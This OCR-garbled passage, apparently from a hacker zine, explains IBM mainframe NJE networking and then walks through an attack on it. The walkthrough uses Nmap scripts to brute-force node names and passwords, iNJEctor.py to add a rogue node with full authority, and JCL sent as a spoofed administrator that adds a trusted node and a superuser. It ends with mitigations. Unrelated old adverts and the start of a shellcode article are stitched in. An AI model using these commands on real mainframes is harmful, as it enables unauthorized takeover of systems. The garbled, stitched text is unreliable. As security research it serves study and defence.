TYPE OHOST OIP RHOST 

C1 C3 D2 40 40 40 40 40 C3 Cl C3 E3 E4 E2 40 40 00 00 00 00 D7 D6 E3 C1 E3 D6 40 40 
A CK C AC TU S 0.00 OP O T A T O 
RIP-——-—R 


OA 0A OA 01 00 
10 10 10 01 O 





Figure 13 - CACTUS receives this packet. 
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6.3.3 NCCR, not a Cruise Line! 


The next part of initialization is sending an ‘T’ 
record. NJE has a bunch of different types of 
records, I, J, K, L, M, N, and B. These are known 
as Networking Connection Control Records (NCCR) 
and control NJE node connectivity. The impor- 
tant ones to know are I (Initial Signon), J (Signon 
Reply), and B (Close Connection). 

An initial sign-on record is made up of many 
components. The important things to know here are 
that the RCB is OxFO, the SRCB is the letter ‘I’ in 
EBCDIC (0xC9), and that there are fields within an 
NCCR I record called NCCILPAS and NCCINPAS that 
are used for password-protected nodes. NCCILPAS x 
2 is used when the nodes passwords are the same, 
whereas you'd use NCCINPAS if the local password 
is different from the target password. For exam- 
ple, if we set the PASSWORD- in NJEDEF above 
to NJEROCKS, we'd put NJEROCKS in both the 
NCCILPAS and NCCINPAS fields. 

We send an I record, then receive a J record, and 
now the two mainframes are connected to one an- 
other. Since we added trusted nodes with RACF, we 
can now submit jobs between the two mainframes as 
users from one system to another. If a user exists 
on both mainframes, jobs submitted from one main- 
frame to run on another will be executed as that user 
on the target system. The assumption is that both 
mainframes are secure and trusted (otherwise why 
would you set them up?) 


6.3.4 Bigger Packets 


As we get deeper into the NJE connection, more 
layers get added on. Once we've reached this phase, 
additional items are are now included in every NJE 
packet: TTB > TTR > DLE > STX 5 BCB > 
FCS > RCB > SRCB > DATA 

We already talked about TTB and TTR. DLE 
(0x10) and STX (0x02) are transmission control. 
The BCB, or Block Control Byte, is always 0x80 
plus a modulo 16 number. It is used for tracking the 
current sequence number and is incremented each 
time data is sent. FCS is the Function Control 
Sequence. The FCS is two bytes long and identifies 
the stream to be used.** RCB is a Record Control 
Byte, which can be one of the following:*° 








43See page 119 of has2a620. pdf. 
44See page 122 of has2a620. pdf. 
45See page 124 of has2a620. pdf. 
46See page 125 of has2a620. pdf. 
^TSee page 123 of has2a620. pdf. 
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0x00 
0x90 
OxAO 
OxBO 
0xCO0 
OxDO 
OxEO 


End of block 

Request to start stream 

Permission to start Stream 

Deny request to start stream 

Acknowledge transmission complete 

Ready to receive stream 

BCB error 

OxF0 Control record (NCCR) 

Ox9A Command or message (NMR) 

0x98—0xF8 SYSIN (incoming data, 
JCL can be other stuff) 

0x99—0xF9 SYSOUT (output from jobs, 
etc) 


usually 


files , 





SRCB is a Source Record Control Byte. For each 
RCB a SRCB is required (IBM calls it a Source 
Record Control Byte, but I like to think of it as 
“Second.”)*6 








0x90 through OxDO the SRCB is the RCB 

of the stream to be started. 

the SRCB is the correct BCB. 

OxF0 The NCCR type (explained in 3.4) 
Ox9A Always 0x00 

0x98-F8 Defines the type of incoming data. 


0x99—F9 Defines the type of output data. 


OxEO 





And finally here is the data. The maximum 
length of a record (or TTR) is 255 bytes. Each 
record must have an RCB and a SRCB, which ef- 
fectively means that each chunk of data cannot be 
longer than 253 bytes. That's not a lot of room! For- 
tunately, NJE implements compression using SCB, 
or String Control Bytes.” SCB compresses dupli- 
cate characters and repeated spaces using a control 
byte that uses a byte's two high order bits to de- 
note that either the following character should be 
repeated x times (101x xxxx), a blank should be in- 
serted x times (100x xxx), or the following x char- 
acters should be skipped to find the next control 
byte (11xx xxxx). 0x00 denotes the end of com- 
pressed data, whereas 0x40 denotes that the stream 
should be terminated. Not everything needs to be 
compressed (for example NCCR records don't need 
to be). 

Figure 14 shows a breakdown of the following 
packet: 00 00 00 3b 00 00 00 00 00 00 00 2b 
10 02 82 8f cf 9a 00 cd 90 77 00 09 db c5 
e6 e8 d6 d9 d2 40 01 a8 00 c6 d7 d6 e3 cl 








e3 d6 82 ca 01 5b c4 40 d5 di c5 c4 c5 c6 
00 00 00 00 00 

Since this is an NMR (RCB = 0x9A), we can 
break down the data after decompression using the 
format described by IBM.* The decompressed pay- 
load is shown in Figure 15. 

Therefore, this rather long packet was used 
to send the command $D NJEDEF from the node 
POTATO to the node NEWYORK. 


6.4 Abusing NJE 


As discussed in Section 6.2.2, userids are expected 
to be the same across nodes. But knowing how en- 
terprises operate requires conducting a little test. 

Pretend that you work for a large enterprise 
with multiple mainframe environments all connected 
through NJE. In this example, two nodes exist: (1) 
DEV and (2) PROD. 

A user named John Smith, who manages pay- 
roll, frequently works in the production environment 
(PROD) and has an account on that system with the 
userid “JSMITH.” 

A developer named Jennifer Smith is hired to 
help with transaction processing. Jennifer will only 
ever do work on the development environment, so an 
“Identity Manager” assigns her the user id “JSMITH” 
on the DEV mainframe. 

What is the problem in this example? How could 
Jennifer exploit her access on DEV to get a bigger 
paycheck? 





48See page 102 of has2a620. pdf. 
49See page 19 of has2a620 pdf. 
50See page 38 of has2a620. pdf. 


Well, the problem is that whoever set up the ac- 
counts didn't bother to check all the environments 
before creating the new user account on DEV. Since 
DEV and PROD are trusted nodes in an NJE net- 
work, Jennifer could submit jobs to the produc- 
tion environment (using /*XEQ PROD), and the JCL 
would execute under Johns permissions—not a very 
secure setup. Worse still, the logs on PROD will 
show that John was the one messing with payroll to 
give Jennifer a raise. 


6.4.1 Garbage SYSIN 


When JCL is sent between nodes, it is called SYSIN 
data. To control who the data is from, the type of 
data, etc., a few more pieces of data are added to 
the NJE record. When JES2 processes JCL, it cre- 
ates the SYSIN records. As it processes the JCL, it 
identifies the /*XEQ command and creates the Job 
Header, Job Data, and Job Footer.*” 

Job Data is the JCL being sent, Job Footer is 
some trailing information, and Job Header is where 
the important components (for us) live. 

Within the Job Header itself there are four sub- 
sections: General, Scheduling, Job Accounting, and 
Security. 

The first three are boring and are just system 
stuff. (They're actually very exciting, but for this 
writeup they aren't important.) The good bits are 
in the Security Section Job Header. The security 
section header is made up of 18 settings: 











Type | Data Value 

TTB 00 00 00 3b 00 00 00 00 | 59 

TTR 00 00 00 2a 43 

DLE 10 DLE 

STX 02 STX 

BCB 82 2 

FCS 8f cf n/a 

RCB | 9a NMR Command/Message 
SRCB | 00 n/a 

Data See Below See Below 
TTB 00 00 00 00 TTB Footer 


The Data field was compressed using SCB. It decompresses to 90 77 00 09 d5 c5 e6 e8 d6 d9 d2 40 01 
00 00 00 00 00 00 00 00 d7 d6 e3 ci e3 d6 40 40 01 5b c4 40 dd di cb c4 c5 c6. 


Figure 14 - Example NJE packet 
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Item Data Value 
NMRFLAG 90 NMRFLAGC Set to “on”. Which means its a command. 
NMRLEVEL | 77 Highest level 
NMRIYPE 00 Unformatted command. 
NMRML 09 Length of NMRMSG 
NMRTONOD | d7 d6 e3 c1 e3 d6 40 40 To NEWYORK 
NMRTOQUL | 01 The identifier. Node 1. 
NMROUT 00 00 00 00 00 00 00 00 The UserID, Console ID. In this case, blank. 
NMRFMNOD | c3 ci c3 e3 e4 e2 40 40 From POTATO 
NMRFMQUL | 01 From identifier. Can be the same. 
NMRMSG 5b c4 40 d5 d1 c5 c4 c5 c6 | Command: “$D NJEDEF” in EBCDIC 
Figure 15 - Decompressed payload from Figure 14. 
Name Size Description The two most important of these are the 
NJHTLEN 2B Length of header NJHTOUSR and NJHTOGRP variables. These define the 
NJHTTYPE IB Type User ID and Group ID of the job coming into the 
(Always 0x8C for security.) system. If someone were able to manipulate these 
NJHTMOD 1B Modifier fields within the Job Header before it was sent to 
0x00 for security. an NJE server, they could execute anything as any 
NJHTLENP 2B Remaining header length. user on the system (so long as they had the ability 
NJHTFLGO 1B Flag for NJHTFOJB which to submit jobs, something almost every user does). 
defines the owner. At this point you're basically two fields away from 
NJHTLENT 1B  Totallength of sec header. owning a system. 
NJHTVERS 1B Version of RACF 
NJHTFLGI 1B Flag byte for 6.4.2 Command and Control 
NJHT1EN (Encrypted or not), 
NJHT1EXT (format) and In Section 6.2.1 we discussed NMR, that is, Nodal 
NJHTSNRF (no RACE) Message Records. These have an RCB of 0x9A. By 
NJHTSTYP 1B Session type far the most interesting property of NMRs is their 
NJHTFLG2 1B Flag byte for NJHT2DFT, ability to send commands from one node to another. 
NJHTUNRF. NJHT2MLO This exists to allow easier, centralized management 
NJHT2SHI, N JHT2TRS, ' ofa bunch of mainframe (NJE) nodes on a network. 
NJHT2SUS, NJHT2RMT You send commands, and the reply gets routed back 
NJHT2DFT | 1b Not verified to you for display. 
NJHTUNRF | 1b Undefined user without RACF For example, we can send the JES2 command 
NJHT2MLO 1b Multiple leaving options $D JQ that will tell us all the jobs that are currently 
NJHT2SHI lb Security data not verified running. To display all the jobs running on CAC- 
NJHT?TRS lb A Trusted user TUS from POTATO, we simply add $N 2 in front 
NJHT2SUS 1b A Surrogate user of the command we wish to execute: $N 2,’$D JQ’ 
NJHT2RMT lb Remote job or data set E fal 
NJHTPOEX 1B Port of entry class 13.42.01 STC00021 $HASP890 JOB(TCPIP) 
NJHTCNOD | 8B Security node deus pa o i] 
NJHTSUSR 8B User ID of Submitter PRIORITY=15, SYSAFF-(EMCI) , 
Ll IR du rei 4 13.42.01 moro T JOB( TN3270) 
vu E E aaron 9| 13.42.01 STC00022 SHASP890 JOB(TN3270) 
h STATUS=(EXECUTING/EMCI) , CLASS=STC, 
NJHTOUSR 8B User ID 11| 13.42.01 $HASP890 
NJHTOGRP 8B Group ID PRIORITY=15, SYSAFF=(EMCI) , 
13 HOLD- (NONE) 
13.42.01 TSU00035 $HASP890 JOB(DADE) 
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15| 13.42.01 TSU00035 $HASP890 JOB(DADE) 























STATUS=(AWAITING HARDCOPY) , li NEXT PROBE 
17 CLASS-TSU, + Queries z/OS Network Job Entry 
13.42.01 SHASP890 3/4 Sends an NJE Probe with the following info 
19 PRIORITY-1, SYSAFF=(ANY) , de TYPE = OPEN 
HOLD=(NONE) 5/4 OHOST — FAKE 
21) [...] # RHOST = FAKE 
7|# RIP and OIP = 0.0.0.0 
FR =0 
9| Probe TCP NJE q|\xd6\xd7\xc5 \xd5@Q@@@\ xc6\xcl 


To make changes at a target system we 
can issue commands with $T. The command $D 
JOBDEF, JOBNUM tells us the maximum number of 11 
jobs that are allowed to run at one time. We 
can increase (or decrease) this number with $T 
JOBDEF , JOBNUM=#. 15 
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1|$D JOBDEF,JOBNUM 

$HASP835 JOBDEF  JOBNUM- 3000 
3|$T JOBDEF,JOBNUM- 3001 

$D JOBDEF,JOBNUM 

5| $HASP835 JOBDEF JOBNUM=3001 











We can do the exact same thing with NJE, 2 
but instead pass it a node number $N 2,'$T 
JOBDEF , JOBNUM=3001’. This is the power of NMR 
commands. Notice that there are no userids or pass- 6 
words here, only commands going from one system 
to another. 8 

A reference for every single JES2 command ex- 
ists.°! Some interesting JES2 commands are the 
ones we already talked about (lowering/increasing 
number of concurrent jobs), but you can also profile 
a mainframe using the various $D (for display) com- 
mands. JOBDEF, INITINFO, NETWORK, NJEDEF, JQ, 
NODE etc. NJEDEF is especially important! 


6.5 Breaking In 


It's now time to make NJE do what we want so we 
can own a mainframe. But there's some information 
you'll need to know: 

- IP/Port running NJE 

- RHOST and OHOST names 

- Password for I record (not always) 

- À way to connect 


6.5.1 Finding a Target System 


Of all the steps, this is likely the easiest step to per- 
form. The most recent version of Nmap (7.10) re- 
ceived an update to probe for NJE listening ports: 








ixd21xc500aQ101010101 xc61xc11xd21xc500400 
\0\0\0\0\0| 

rarity 9 

ports 175 

sslports 2252 

# If the port supports NJE it will respond 

# with either a ’NAK’ or ’ACK’ in EBCDIC 

match nje m|*\xd5\xcl\xd2| p/IBM Network Job 
Entry (JES) / 

match nje m|*\xcl\xc3\xd2| p/IBM Network Job 
Entry (JES) / 





Using Nmap it’s now easy to find NJE: 








$ nmap —sV —p 175 10.10.10.1 


Starting Nmap 6.49SVN (https: //nmap. org) 
Nmap scan report for 
LPARI.CACTUS.MAINFRAME.COM (10.10.10.1) 
Host is up (0.0018s latency). 

PORT STATE SERV VERSION 

175/tcp open nje IBM Net Job Entry (JES) 





6.5.2 RHOST, OHOST, and I Records 


This is the trickiest part of breaking NJE. Recalling 
our earlier discussion of connecting, you need a valid 
RHOST (any systems node name) and OHOST 
(the target systems node name). If the RHOST 
or OHOST are wrong, the system replies with an 
NJE NAK reply and a reason code R. Oftentimes the 
node name of a mainframe is the same as the host 
name; so you should try those first. Otherwise, it 
will likely be documented somewhere on a corporate 
intranet or in some example JCL code with /*XEQ— 
or you could just ask someone, and they'll probably 
tell you. 

If you have access to the target mainframe 
already, you could try a few things, like read- 
ing SYS1.PARMLIB(JES2PARM) and searching for 
NJEDEF/NODE. You could also issue the JES2 
command $D NJEDEF or $D NODE, which will list all 
the nodes and their names: 


SIpttps://www.ibm.com/support/knowledgecenter/SSLTBW 2.1.0/com.ibm.zos.v2r1l.hasa200/has2cmdr.htm 
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$D node 
SHASP826 NODE(1) 


$HASP826 NODE(1) NAME-POTATO, 
STATUS- (OWNNODE) , 
TRANSMIT-BOTH, 
$HASP826 RECEIVE=BOTH, HOLD=NONE 





$HASP826 NODE(2) 
$HASP826 NODE(2) NAME=CACTUS, 
STATUS=(CONNECTED) , 
TRANSMIT-BOTH, 
RECEIVE-BOTH, 
HOLD-NONE 


$HASP826 











If none of those options work for you, it's time to 
use brute force. When you connect to an NJE port 
and send an invalid OHOST or RHOST, you get a 
type of NAK with a reason code of R=1. However, 
when you connect to NJE and place the RHOST 
value in the OHOST field, it replies with a NAK but 
with a reason code of 4! Now this is something we 
can use to our advantage. 

Using Nmap again, we can now use a newly- 
released NSE script nje-node-brute.nse to brute- 
force a system's OWNNODE node name:?? 


NJE node communication is made up 
of an OHOST and an RHOST. Both 
fields must be present when conducting 
the handshake. This script attempts to 





52https://nmap.org/nsedoc/scripts/nje-node-brute.html 


unzip pocorgtfo12.pdf nje-node-brute.nse 
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determine the target systems NJE node 
name. 


By default, the script will try to brute-force 
a system’s OHOST value. First trying the main- 
frame’s hostname and then using Nmap’s included 
list of default hosts. Since NJE nodes will generally 
only have one node name, it’s best to use the script 
argument brute.firstonly=true. 








$ nmap —sV —p 175 10.10.10.1 \ 
— script nje—node—brute Y 
——script—args brute. firstonly=true 


Starting Nmap 7.10SVN (https: //nmap. org) 

Nmap scan report for LPAR1.POTATO.MAINFRAME. 
COM (10.10.10.1) 

Host is up (0.0012s latency). 

PORT STATE SERV VERSION 

175/tcp open nje IBM Net Job Entry (JES) 

| nje-node-brute: 

| Node Name(s) : 

Node Name:POTATO — Valid credentials 





With the OHOST determined (POTATO), we 
can brute-force valid RHOSTs on the target sys- 
tem. Using the same nje-node-brute Nmap script, 
we use the argument ohost=POTATO. Before run- 
ning the script, it’s best to do some recon and 
discover names of other systems, decommissioned 
systems, etc. 


These can be placed in the file 
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rhosts.txt and passed to the script using the ar- 
gument hostlist=rhosts.txt: 








$ nmap —sV —p 175 10.10.10.1 Y 
—— script nje—node—brute \ 
script —args=ohost=’POTATO’ , hostlist= 
rhosts.txt 





Starting Nmap 7.10SVN (https: //nmap. org) 
Nmap scan report for LPAR1.POTATO. 

COM (10.10.10.1) 
Host is up (0.00090s latency). 
PORT STATE SERV VERSION 
175/tcp open nje IBM Net Job Entry (JES) 
| nje-node-brute: 
| Node Name(s): 
| POTATO:SANDBOX — Valid credentials 
| POTATO:CACTUS — Valid credentials 
| POTATO:LPAR5 — Valid credentials 








Note: If CACTUS was connected at the time 
this script was run, it wouldn’t show up in the list 
of valid systems. This is due to the fact that a 
node may only connect once. So if you're doing this 
kind of testing, you might want to wait for mainte- 
nance windows to try and brute-force. With valid 
RHOSTs (SANDBOX, CACTUS, and LPAR5) and 
the OHOST (POTATO) in hand we can now pre- 
tend to be a node. 

In most places, this will be enough to allow you 
to fake being a node. In some places, however, 
they'll have set the PASSWORD= parameter in the 
NJEDEF config. This means that we've got one 
more piece to brute-force. 

Thankfully, there's yet another new Nmap script 
for brute-forcing I records, nje-pass-brute. 


After successfully negotiating an 
OPEN connection request, NJE requires 
sending, what IBM calls, an “T record.” 
This initialization record may sometimes 
require a password. This script, provided 
with a valid OHOST/RHOST for the 
NJE connection, brute forces the pass- 
word. 


Using this script is fairly straightforward. You 
pass it an RHOST and OHOST, and it will attempt 
to brute-force the I record password field: 
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Starting Nmap 7.10SVN (https: //nmap. org) 

Nmap scan report for LPAR1.NEWYORK. MAINFRAME 
.COM (10.10.10.1) 

Host is up (0.0012s latency). 

PORT STATE SERV VERSION 

175/tcp open nje IBM Net Job Entry (JES) 

| nje—pass—brute: 

| NJE Password: 

| Password :NJEROCKS — Valid credentials 





Behind the scenes, this script is connecting 
and trying “I Records” setting the NCCILPAS and 
NCCINPAS variables to the passwords in your word 
list. 


6.5.3 I'm a Pretender 


Using the information we've gathered, we could 
set up our own mainframe, add an NJEDEF sec- 
tion to the JES2 configuration file, and connect to 
POTATO as a trusted node. But who's got millions 
to spend on a mainframe? The good news is you 
don't have to worry about any of that. Since get- 
ting your hands on a real mainframe is all but im- 
possible, your author wrote a Python library that 
implements the NJE specification, allowing you to 
connect to a mainframe and pretend to be a node.53 

Using the NJE library, we can do a couple of 
interesting things, such as sending commands and 
messages, or sending JCL as any user account. 

First, we're going to create our own node, just 
in case the node we're pretending to be comes 
back online (preventing us from using it). Using 
iNJEctor.py we can send commands we'd like to 
have processed by the target node. Before doing 
that, we need to see how many nodes are currently 
declared with $D NJEDEF , NODENUM: 





$ ./iNJEctor.py 10.10.10.1 CACTUS POTATO Y 
"\$D NJEDEF,NODENUM" ——pass NJEROCKS 


The JES2 NJE Command Injector 
Signing on to 10.10.10.1 175 


Signon to 10.10.10.1 Complete 
Sending Command: $D NJEDEF,NODENUM 








nmap —sV —p 175 10.10.10.1 À 
——script nje—pass—brute \ 
script—args—brute.firstonly-true , ohost 
=’POTATO’ ,rhost="cactus” ,passdb= 
passwords.txt 








53git clone https: //github.com/zedsec390/NJElib 
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Reply Received: 


13.12.26 $HASP831 NJEDEF NODENUM=4 














$ ./iNJEctor.py 10.10.10.1 


CACTUS POTATO "\$T NJEDEF,NODENUM-5" ——pass NJEROCKS -q 





13.25.34 $HASP831 NJEDEF 

13.25.34 $HASP831 NJEDEF OWNNAME-POTATO,OWNNODE= 1 ,CONNECT=(YES,10) , 
13.25.34 SHASPS831 DELAY=120,HDRBUF= (LIMIT —10,WARN- 80 ,FREE-— 10) , 
13.25.34 SHASP831 JRNUM=1,JTNUM=1,SRNUM=1,SINUM=1,LINENUM=1, 
13.25.34 SHASP831 MAILMSG-NO,MAXHOP- 0 ,NODENUM=5 ,PATH- 1 , 
13.25.34 SHASPS31 RESTMAX=262136000,RESTNODE=100,RESTTOL=0, 
13.25.34 SHASP831 TIMETOL=1440 


$ ./iNJEctor.py 10.10.10.1 


13.26.15 $HASP826 NODE(5) 
13.26.15 $HASP826 NODE(5) 
13.26.15 $HASP826 


$ ./iNJEctor.py 10.10.10.1 
——pass NJEROCKS —q 


13.27.13 $HASP897 SOCKET (H4CKR) 
13.27.13 $HASP897 SOCKET (HACKR) 
13.27.13 $HASP897 
13:27.13 $HASP897 
13.27.13 $HASP897 


CACTUS POTATO "\$T NODE(5) ,name-H4 


" — pass NJEROCKS —q 


NAME-HACER, STATUS=(UNCONNECTED) , TRANSMIT-BOTH, 
RECEIVE-BOTH, HOLD-NONE 





CACTUS POTATO "\$add socket (h4ckr) ,node=h4ckr , ipaddr —3.1.33.7" \ 


STATUS-INACTIVE,IPADDR=3.1.33.7, 
PORINAME-VMNET, CONNECT- (DEFAULT) , 
SECURE-NO, LINE=0,NODE=5,REST=0, 
NETSRV=0 











Figure 16 — Example use of iNJEctor. py. 


We'll increase that by one with the com- 
mand $T NJEDEF,NODENUM=5, then add our own 
node called h4ckr using the commands $T 
NODE(5) ,name=H4CKR and $add socket (h4ckr). 
See Figure 16. 


The node h4ckr has now been created. Finally, 
we'll want to give it full permission to do any- 
thing it wants with the command $T node(h4ckr), 
auth=(Device=Y,Job=Y,Net=Y,System=Y). See 
Figure 17 

Good, we have our own node now. This will 
only allow us to send commands and messages. If 
we wanted, we could mess with system administra- 
tors now. 








$ ./iNJEctor.py 10.10.10.1 h4ckr POTATO Y 
—u margo —m Y 
"MESS WITH THE BEST DIE LIKE THE REST’ 
The JES2 NJE Command Injector 


Signing on to 10.10.0.200 175 

Signon to 10.10.0.200 Complete 

Sending Message ( MESS WITH THE BEST DIE 
LIKE THE REST ) to user: margo 

Message sent 
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And when Margo logs on, or tries to do anything 
she would receive this message: 








READY 


MESS WITH THE BEST DIE LIKE THE REST CN( 
INTERNAL) 





That is fun and all, but we could also do real 

damage, such as shutting off systems or lowering 
resources to the point where a system becomes un- 
responsive. But where's the fun in that? Instead, 
let's make our node trusted. 
We'll need to find a user with the appropriate 
permissions first. From previous research, I know 
Margo runs operations and has a userid of margo. 
Using jcl.py we can send JCL to a target node. 
This script uses the NJELib library and manipu- 
lates the NJHTOUSR and NJHTOGRP settings in the 
Job Header Security Section to be any user we'd 
like. We already know CACTUS is a trusted node 
on POTATO, so let's use that trust to submit a job 
as Margo. 

To check if she has the permissions we need, 
we use the program IKJEFTO1, which executes TSO 
commands, and the RACF TSO command 1u, which 
lists a user's permissions. We see this in Figure 18. 
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$ ./iNJEctor.py 10.10.10.1 CACTUS POTATO \ 








"\$T node(h4ckr) ,auth=(Device=Y, Job=Y, Net=Y, System=Y)" ——pass NJEROCKS —q 
13.29.20 $HASP826 NODE(5) 
13.29.20 $HASP826 NODE(5) NAME=H4CKR,STATUS=(UNCONNECTED) , 
13.29.20 SHASP826 AUTH=(DEVICE=YES , JOB=YES , NET=YES ,SYSTEM=YES) , 
13.29.20 SHASP826 TRANSMIT=BOTH, RECEIVE-BOTH, HOLD-NONE, 
13.29.20 SHASP826 PENCRYPT-NO, SIGNON-COMPAT, ADJACENT-NO, 
13.29.20 SHASP826 CONNECT=(NO) ,DIRECT=NO, ENDNODE=NO, REST=0, 
13.29.20 SHASP826 SENTREST=ACCEPT,COMPACT=0,LINE=0 ,LOGMODF =, 
13.29.20 $HASP826 LOGON=0 ,NETSRV=0 OWNNODE-NO, 
13.29.20 $HASP826 PASSWORD- (VERIFY=(NOTSET) , 
13.29.20 SHASP826 SEND= (FROM OWNNODE) ) ,PATHMGR-YES , PRIVATE-NO, 
13.29.20 SHASP826 SUBNET=,TRACE-NO 








Figure 17 — iNJEctor.py giving full permissions. 


The important line here is ATTRIBUTES=SPECIAL, 
meaning that she can execute any RACF command. 
This, in turn, means she has the ability to add 
trusted nodes for us. Now that we confirmed she 
has administrative access, we submit some JCL 
that executes the commands we need to add a new 
trusted node. While we're at it, might as well add a 
new superuser named DADE, as shown in Figure 19. 

Now we added the node H4CKR as a trusted node. 
Therefore, any userid that exists on POTATO is now 
available to us for our own nefarious purposes. In 
addition, we added a superuser called DADE with 
access to both TSO and UNIX. From here we could 
shutdown POTATO, execute any commands we'd 
like, create new users, reset user passwords, down- 
load the RACF database, create APF authorized 
programs. The ownage is endless. 
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./ jel. py CACTUS POTATO 10.10.10.1 JCL/tso.jcl margo 
+] RHOST: CACTUS 
+] OHOST: POTATO 


+] IP : 10.10.10.1 
+] File : JCL/tso.jcl 
+| User : margo 

+] Connected 














+] Sending file: JCL/tso.jcl 
10 20 30 40 50 60 70 80 





//H4CKRNJE JOB (1234567), "ABC 123’,CLASS=A, 
// MSGLEVEL= (0,0), MSGCLASS=K, NOTIFY=&S Y SUID 
/*XEQ POTATO 
//TSOCMD EXEC  PGM-IKJEFTO01 
//SYSTSPRT DD SYSOUT=x 
//SYSOUT | DD SYSOUT=x 
//SYSTSIN DD * 
lu 


/* 





10 20 30 40 50 60. 70 80 








[+] User Message 
[+] User: MARGO 
[+] Message: 15.03.19 JOB00046 $HASP122 H4CKRNJE (JOB00049 FROM CACTUS) RECEIVED AT POTATO 











[+] Records in SYSOUT: 
1 


JES2 JOB LOG — SYSTEM EMC1 — NODE POTATO 
0 
[tor] 
1READ 
lu 
USER-MARGO NAME=Margo Smith OWNER=MINING CREATED=15.104 
DEFAULT-GROUP-MINING | PASSDATE=16.083 PASS-INTERVAL=180 PHRASEDATE-N/A 
ATTRIBUTES-SPECIAL OPERATIONS 
fa] 
READY 
END 





Figure 18 — JCL permissions check 
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./ jel. py CACTUS POTATO 10.10.10.1 JCL/racf.jcl margo 
+] RHOST: CACTUS 
+] OHOST: POTATO 


+] IP : 10.10.10.1 
+] File : JCL/racf.jcl 
+| User : margo 

+] Connected 














+] Sending file: JCL/racf.jcl 





10 20 30 40 50 60 70 80 


//H¿CKRNJE JOB (1284567), ABC 123',CLASS-A, 
// MSGLEVEL= (0,0) , MSGCLASS=K, NOTIFY=€S YSUID 
/*XEQ | POTATO 
//TSOCMD | EXEC PGM=IKJEFTO1 
//SYSTSPRT DD SYSOUT=x 
//SYSOUT DD  SYSOUT=« 
//SYSTSIN DD * 
RALTER RACFVARS &RACLNDE ADDMEM(H4CKR) 
SETROPTS RACLIST(RACFVARS) REFRESH 
ADDUSER DADE PASSWORD(BESTPWD) 
ALU DADE TSO(ACCINUM(ACCT4) PROC(ISPFPROC) ) 
ALU DADE OMVS(UID (313377) PROGRAM( / bin/sh) HOME(/) ) 


Ja 





10 20 30 40 50 60. 70 80 








[+] Response Received 
[+] NMR Records 








[+] User Message 
[+] To User: MARGO 
[+] Message: 15.29.55 JOB00048 $HASP122 H{CKRNJE (JOB00049 FROM CACTUS ) RECEIVED AT POTATO 











[+] Records in SYSOUT: 


1 JES2 JOB LOG — SYSTEM EMC1 — NODE POTATO 
0 

[ccnl 

1READ 


RALTER RACFVARS ERACLNDE ADDMEM(H¿CKR) 
ICH110091 RACLISTED PROFILES FOR RACFVARS WILL NOT REFLECT THE UPDATE(S) UNTIL A SETROPTS 
REFRESH IS ISSUED. 
READY 
SETROPTS RACLIST(RACFVARS) REFRESH 
READY 
ADDUSER DADE PASSWORD(BESTPWD) 
READY 
ALU DADE TSO(ACCINUM(ACCT#) PROC(ISPFPROC)) SPECIAL 
READY 
ALU DADE OMVS(UID (31887) PROGRAM(/ bin/sh) HOME(/)) 
READY 
END 





Figure 19 — Adding a superuser 
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6.6 Conclusion 


NJE is relatively unknown despite being so widely 
used and important to most mainframe implementa- 
tions. Hopefully, this article showed you how power- 
ful NJE is, and how dangerous it can be. Everything 
in this article could be prevented with a few simple 
tweaks. Not using the PASSWORD= parameter and 
instead using SSL certificates for system authenti- 
cation would make these attacks useless. On top of 
that, instead of declaring the nodes to RACF, you 
could give very specific access rights to users from 
various nodes. This would prevent a malicious user 
from submitting as any user they please. 

If you're really interested in this protocol, 
NJELib also supports a debug mode, which gives 
information about everything happening behind the 
scenes. It's very verbose. Another feature of 
NJELib is the ability to deconstruct captured pack- 
ets. 

With the information in this article, you should 
now have a grasp of the mainframe and NJE. Your 
interest has been piqued about the endless poten- 
tial of mainframe hacking. If that's the case, where 
do you go from here? There are some great write- 
ups about buffer overflows and crypto on z/OS at 
bigendiansmalls.com. You can also read up about 
tn3270 hacking at mainframed767.tumblr. com. 
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Henry f Miller 


TONE 


is first conceived in the mind of the artist, 
who is aided in its expression by the per- 
fection of the instrument he uses. 

Henry F. Miller was a musician of matured 
judgment when in 1863 he began to make pianos; 
he built the kind of pianos upon which he himself 
liked to play, and HIS standard of TONE QUALITY 


is expressed in the instruments which bear his nam:. 





Many artists and critics prefer the Henry F. 
Miller Tone to all others; to know it is to like 
it, and those love it most who know it best, 
because it wears the longest. 
To-day, better than ever, - 
it confidently invites your 
li critical judgment. 
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your best supply source for 
ELECTRON TUBES for every 
Amateur & Industrial Use 


LLIED 

















IMMEDIATE DELIVERY FROM STOCK 


ALLIED stocks for quick shipment the world’s 
largest distributor inventory of receiving, 
kinescope and special-purpose electron tubes. 
Whether your tube requirements are for 
your station equipment or for your work in 
industry, you can always depend on us for 
quick, efficient shipment direct from 
our huge stocks. To save time, effort 
and money—phone, wire or write to us 
for fast delivery. 


FREE 308-PAGE BUYING GUIDE 


Refer to your latest ALLIED Catalog for 
everything you require in Amateur gear and 
electronic supplies. Get every buying advan- 
tage: quick shipment from the largest stocks 
available; easy payment plan on Ham gear; 
unbeatable trade-ins; real help from our Ham 
staff. Yes, get everything you need at ALLIED. 
If you haven't a copy of our 1955 Catalog, 





write for it today. 


Everything for the Amateur ALLIED RADIO 


from one complete 100 N. Western Ave., Dept. 15-E-5 Chicago 80, IIl., 
dependable source HAymarket 1-6800 






== ultra-modern facilities to serve you best 
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7 Exploiting Weak Shellcode Hashes to Thwart Module Discovery; 
or, Go Home, Malware, You’re Drunk! 


There is a famous Soviet film called Mponua 
cydvbo, unu C ntexum napom! (The Irony of Fate, 
or Enjoy Your Bath!) that pokes fun at the unifor- 
mity of Brezhnev-era public architecture and hous- 
ing. The protagonist of the movie gets drunk and 
winds up on a plane bound for Leningrad. When 
he arrives, he mistakenly believes he landed in his 
home town of Moscow. He stumbles into a taxi and 
gives the address of his apartment. Sure enough, the 
same address exists in Leningrad, and the building 
looks identical to his apartment in Moscow. His key 
even unlocks the apartment with the same number, 
and the furniture inside is nearly identical to his, 
so he decides to go to sleep. Everyone’s favorite 
heart-warming romantic comedy ensues, but that’s 
another story. 

Neighbors, the goal of this article is to convince 
you that Microsoft is Brezhnev, Windows is the So- 
viet Union, kernel32.d11 is the apartment, and 
malware is the drunk protagonist. Furthermore, 
dear neighbor, we will provide you with the knowl- 
edge of how to coax malware into tippling from our 
proverbial single malt waterfall so that it mistakenly 
visits a different apartment in a faraway city. 


7.1 Background: PIC and Malware 


Let's begin with a look at how position-independent 
code (PIC) used by malware is different from be- 
nign code, and then examine the logic of the Meta- 
Sploit payload known as “windows/exec,” which is 
a representative example of both exploit shellcode 
and malware-injected position-independent code. If 
you're already familiar with how malware-injected 
position-independent code works, it's safe for you to 
skip to Section 7.2. 

Most executable code on Windows is dynami- 
